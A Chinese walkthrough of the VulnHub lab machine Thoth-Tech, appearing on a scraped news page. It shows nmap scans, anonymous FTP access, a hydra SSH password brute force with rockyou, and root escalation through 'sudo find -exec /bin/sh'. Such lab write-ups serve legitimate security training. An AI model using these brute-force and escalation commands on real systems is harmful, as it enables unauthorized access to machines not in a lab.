当前位置: 首页 > news >正文

vulnhub靶机Thoth-Tech

news 2025/8/5 13:59:57

下载地址:https://download.vulnhub.com/thothtech/Thoth-Tech.ova

主机发现

arp-scan -l

目标:192.168.21.148

端口扫描

nmap --min-rate 10000 -p- 192.168.21.148

服务扫描

nmap -sV -sT -O -p21,22,80 192.168.21.148

漏洞扫描

nmap --script=vuln -p21,22,80 192.168.21.148

先去看web网站

在f12里面发现

再去看看web的别的

感觉少了点东西于是又扫了一遍

nmap -A 192.168.21.148

发现ftp能匿名登入

去看看(用户名anonymous

ftp 192.168.21.148

这里告诉我们pwnlab能爆破

hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.21.148

ssh登入

ssh pwnlab@192.168.21.148

第一个flag

信息收集

10和11是我执行的发现有find

这里用find找可执行的文件

find / -user root -perm /40000 2>/dev/null

没有东西

再看看sudo

find没有密码要求,那么就需要利用这个来提权了

find 命令提权 - 编程猎人 (programminghunter.com)

sudo find . -exec /bin/sh \; -quit

结束

http://www.lryc.cn/news/168522.html

相关文章:

  • 不可思议,无密码登录所有网站!
  • 深度学习编译器关键组件
  • 【C++】string类模拟实现下篇(附完整源码)
  • Android高级开发-APK极致优化
  • Rocketmq--消息驱动
  • 华为云云耀云服务器L实例评测|centos系统搭建git私服
  • 苹果CMS主题 MXonePro二开优化修复开源版影视网站源码
  • 【新版】系统架构设计师 - 软件架构设计<轻量级架构>
  • 系统架构设计专业技能 ·结构化需求分析 - 数据流图
  • linux内核分析:线程和进程创建,内存管理
  • SpringMvc根据返回值类型不同处理响应
  • jq命令安装与使用
  • 网络面试题汇总
  • Java————初始集合框架
  • SpringMvc如何向context域设置数据
  • 深入探索智能问答:从检索到生成的技术之旅
  • 02_Flutter自定义Sliver组件实现分组列表吸顶效果
  • uniapp实现大气质量指标图(app端小程序端均支持,app-nvue不支持画布)
  • Oracle for Windows安装和配置——2.1.Oracle for Windows安装
  • 2.SpringEL bean引用实例
  • 通用商城项目(下)之——Nginx的安装及使用
  • 滑动时间窗口的思想和实现,环形数组,golang
  • SpringBoot 使用异步方法
  • Django框架学习大纲
  • 基于matlab实现的电力系统稳定性分析摆幅曲线代码
  • mybatis基本构成mybatis与hibernate的区别添加mybatis支持
  • c++23中的新功能之十四输入输出指针
  • Day42:网易云项目,路由进阶
  • Open3D(C++) 三维点云边界提取
  • AUTOSAR汽车电子嵌入式编程精讲300篇-经典 AUTOSAR 安全防御能力的分析及改善